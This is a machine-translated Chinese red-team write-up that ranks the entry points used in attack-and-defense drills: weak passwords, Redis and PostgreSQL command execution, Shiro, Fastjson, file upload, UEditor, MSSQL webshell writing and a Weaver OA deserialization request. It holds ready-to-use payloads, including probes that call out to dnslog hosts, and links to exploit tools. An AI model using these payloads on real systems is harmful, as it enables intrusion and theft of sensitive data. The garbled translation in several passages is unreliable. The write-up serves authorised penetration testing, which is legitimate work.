preface
(it may be narrow-minded, there are deficiencies and mistakes, and the masters take it more often)
【View information】
Author: 0ne
The data of this article comes from the failure report of 18 + provincial and municipal level HVV and 90 + units. (one part is the author’s participation, and the other part is the report of other masters of the company) the idea is simple, not including fishing and blowing up the sky on 0day.
Statistical chart of breakthrough entry point methods:
The scoring items in the attack and defense drill only focus on two points: permission & data: the type of permission is divided into system permission and application permission, and the level of permission is divided into administrator permission and ordinary user permission. Data is generally a four piece set, name, mobile phone number, ID card and address. Usually, sensitive data is defined in this way, but depending on the current application, the definition of sensitive information may be different. For example, in the hospital system, case information is even sensitive data.
According to the above statistical results, the method of selecting some scores from high to low is explained.
Weak password [web application]
Weak password is a loophole that can never be repaired. Every attack and defense drill will have a hole torn by weak password (29 times)
The weak passwords of some web applications are discussed here, excluding the weak passwords of PostgreSQL / redis / VPN / Jenkins / administrator in the statistical results.
Speaking of weak password, we have to mention the skills of blasting. Before blasting, try to bypass the verification code. Some verification codes are not refreshed or there are verification logic errors that can be bypassed. Usually, there may be a user name enumeration vulnerability where you forget your password. For the user name dictionary, it can be guessed as short name or job ID according to the current system. You can also browse the JS regular of the current login box or Google information search to make a reasonable guess. In the case of a large number of user bases, it is usually the best to traverse the user name with a fixed weak password. After obtaining the login background password MD5 decryption through SQL injection for many times, the probability that the administrator appears with the domain name abbreviation or the system abbreviation + @ year, or the password of the relevant abbreviation is not small. For example: a fire protection system / bjtuxfk [XXXX fire department], the backstage of a women’s Federation/ [email protected] 。
A handy dictionary
https://github.com/fuzz-security/SuperWordlist
https://github.com/gh0stkey/Web-Fuzzing-BoxWeak password [other]
The database weak password only meets PostgreSQL / redis. Other commonly used databases are often used. The rest may not even know that it is on for operation and maintenance.
PostgreSQL (versions 9.3 to 11.2) arbitrary command execution vulnerability (cve-2019-9193)
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Redis
Connect info to view server information [redis version and OS information]:
Redis 4.x/5.x RCE
https://github.com/Dliv3/redis-rogue-server
https://github.com/0671/RedisModules-ExecuteCommand-for-Windows
Linux
Write plan task, write public key, write webshell [know web path]
Windows
Write startup item, write webshell [know web path]
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
https://github.com/r35tart/RedisWriteFile
To be honest, I haven’t encountered windows. I have enough permissions. Write the startup item first, and then try to restart it [YY hasn’t called QAQ]
These two windows & redis articles are quite detailed:
https://xz.aliyun.com/t/8153
https://xz.aliyun.com/t/7940
VPN weak password
If it is webvpn, the user base is large, and the weak password can be fixed and exploded according to the student ID and job ID. The VPN weak password in the case is a client that needs to be downloaded. The password is not like trying out, but more like leaking information from Google / git, or knowing the employee’s mobile phone number and throwing it into his pants, and putting it together according to the information inside [personal guess].
Jenkins weak password
The command line of the background script can execute commands. There is nothing to say about the download and execution of lolbas.
Admin weak password
There’s nothing to say about MySQL writing webshell.
Shiro deserialization
Shiro forever god! Without Shiro, I don’t know how to stand on the day (28 times)
Over the past two years, Shiro deserialization can be described as the first vulnerability utilization in the attack and defense drill. Whether it is the asset collection platform developed by the company or the excellent project shuize on git, it carries Shiro fingerprint identification. Shiro is also very simple to find the target. The target spreads from domain name to subdomain name to IP to full port. Import these URLs into Shiro identification tool. Run again and reuse. Among the 28 shiros counted, 27 were collected through oneforall or fofa, and one Shiro was found in the wechat official account.
Easy to use tools:
https://github.com/pmiaowu/BurpShiroPassiveScan
https://github.com/wyzxxz/shiro_rce_tool
https://github.com/j1anFen/shiro_attack
Any file upload [general]
Plain and unadorned (10 occurrences)
In general, the fastest way to get the shell is to find the upload. We should quickly verify whether the upload is based on the back-end white list verification. If the vulnerability is not resolved in the back-end or the combination of other vulnerabilities, we should abandon it in the verification list. It should be noted that when we judge the black-and-white list of uploaded files, the uploaded file content should be harmless, otherwise it may cause WAF interference. We must know whether the upload failure is due to the limitation of the program itself or the obstruction of WAF. Do not fuzz the upload interface. The thunder and rain are small.
It is worth mentioning that among the 10 uploads counted, once in the wechat applet, there was a swagger information disclosure upload interface, and once in the online chat system of a bank, when you click the manual time, the button of transmitting pictures will appear.
Customer service system:
There is another case:
Enter the background, upload files through kindeditor, and manage files through XXXX. It has the function of renaming, which is changed to php。 getshell。
The essence of file upload around WAF is the difference between the server and WAF in packet analysis. Here are several abnormal packets:
Fastjson deserialization
Easy to use (occurrence 6)
Judge whether it is fastjson: an error is reported, an exception is thrown, or dnslog
{"rand1":{"@type":"java.net.InetAddress","val":"gbi7ge.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}
Meet WAF:
Hex encoding or \ B:
See:
https://www.sec-in.com/article/950
https://xz.aliyun.com/t/7568
Easy to use tools:
https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/wyzxxz/fastjson_rce_tool
https://github.com/feihong-cs/JNDIExploit
Disclosure of sensitive information
No matter how small a fly is, it is also meat (5 times)
Hospitals, the most common cases are wechat official account or small programs, which traverse case data:
Swagger information disclosure construction interface query is also encountered:
UEditor1. 4.3 upload any file
Surprise (number of occurrences 5)
When you meet Net website, right-click to view the picture, and the URL is/ueditor/Upload / image / [20200101] this year / month format / 25 digits Png, we can judge that the site uses ueeditor [direct directory scanning tool is OK], so we need to splice the path ~ / net / controller ashx:
~The front may not be fixed. You need to find information in JS or make reasonable guesses.
Mention it, I met a site before png?. Aspx, the site returned 404, you can directly png. Aspx, and ueeditor has filtering? When WAF is available, it can be used as appropriate.
MSSQL Stack Injection
Basic operation
–After OS shell, you can get a command line, which is usually downloaded and executed by certutil or directly launched by PowerShell. You can also write to webshell:
Find static resource location physical path
for /r C:\ %i in (*xxx*) do @echo %i
dir /s/a-d/b C:\*xxx.xxx
Echo ^ < one sentence ^ > > C: \ phpstudy_ pro\WWW\shell. txt
< > be careful to use ^ escape
OA system
There’s nothing to say. There’s 0day smashing 0day
extensiveOA, toOA, communicationOA, withNC
GitHub search, internal accumulation, undisclosed utilization points are the best.
The two cases of Pan * OA use workflowservicexml deserialization, which is relatively smooth.
Determine whether it is available:
POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 523
Content-Type: text/xml;charest=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest>
<web:string>
<map>
<entry>
<url>http://m5alw5.dnslog.cn</url>
<string>http://m5alw5.dnslog.cn</string>
</entry>
</map>
</web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>
mixed
talk nonsense
It doesn’t matter to get sensitive data by SQL injection. Remember to add the parameter random agent to sqlmap.
S2 sees less on the Internet, and I don’t know how the boss got in through the wall.
Historical backdoor 404 JSP has become an entry point is also outrageous.
All kinds of debug information are leaked. Import the cloud key into the cloud housekeeper and prove the permission.
Already incoherent
gossip
Picking up persimmons and kneading them soft
Web management is an efficiency job. It’s soft persimmon. Don’t give you a site. It took a long time to find out: eh, there’s an upload / Shiro / fastjson This will delay our efforts. We should be purposeful, try to reduce the process of trial and error and do less useless work.
last
Pay attention to me! Continuous update – private access【Network security learning materials · introduction】